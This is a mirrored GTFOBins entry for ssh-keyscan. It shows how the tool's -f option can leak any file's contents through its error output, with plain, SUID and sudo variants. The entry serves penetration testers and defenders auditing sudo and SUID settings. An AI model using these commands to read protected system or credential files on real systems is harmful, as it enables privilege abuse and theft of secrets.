1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-15 20:01:34 +01:00
GTFOBins.github.io/_gtfobins/ssh-keyscan.md

18 lines
337 B
Markdown

---
description: |
The read file content is corrupted by error prints.
functions:
file-read:
- code: |
LFILE=file_to_read
ssh-keyscan -f $LFILE
suid:
- code: |
LFILE=file_to_read
./ssh-keyscan -f $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo ssh-keyscan -f $LFILE
---